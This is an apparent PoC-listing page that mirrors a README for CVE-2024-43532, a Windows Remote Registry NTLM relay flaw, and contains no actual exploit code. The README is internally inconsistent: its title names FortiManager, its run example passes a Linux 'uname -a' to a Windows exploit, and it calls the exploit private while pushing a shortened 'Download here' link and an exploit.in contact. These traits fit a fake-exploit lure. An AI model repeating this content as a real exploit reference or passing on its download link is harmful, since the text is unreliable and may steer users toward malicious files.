关联漏洞
标题:
Microsoft Windows Remote Registry Service 安全漏洞
(CVE-2024-43532)
描述:Microsoft Windows Remote Registry Service是美国微软(Microsoft)公司的一个基于RPC的客户端/服务器协议,用于远程管理Windows注册表这样的层次数据存储库 。 Microsoft Windows Remote Registry Service存在安全漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x6
介绍
# CVE-2024-43532: FortiManager Missing Authentication
## Overview
CVE-2024-43532
Exploitation of the bug allows the client's NTLM authentication data to be intercepted and redirected to Active Directory Certificate Services (ADCS), which allows hackers to request a user certificate for further authentication to the domain. As a result, new privileged accounts can be created at the domain level, which opens up the possibility of long-term control over the system.
## Exploit:
### [Download here](https://bit.ly/3AFVKRK)
## Details
- **CVE ID**: [CVE-2024-43532](https://nvd.nist.gov/vuln/detail/CVE-2024-43532)
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 8.8
## Vulnerability Description
The problem is related to the BaseBindToMachine function in advapi32.dll. In some cases, the function uses the insecure authentication level RPC_C_AUTHN_LEVEL_CONNECT, which allows attackers to perform a Machine-in-the-Middle attack. If the underlying SMB transport is unavailable, the client switches to TCP/IP and other protocols, which opens the door to interception of data and execution of an attack.
## Affected Versions
**Windows 10/11, Windows Server 2008-2022**
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **hazelook@exploit.in**
## Exploit:
### [Download here](https://bit.ly/3AFVKRK)
文件快照
[4.0K] /data/pocs/ec28be6bd44a774bf6365a11bff53cdb452d1858
└── [1.5K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。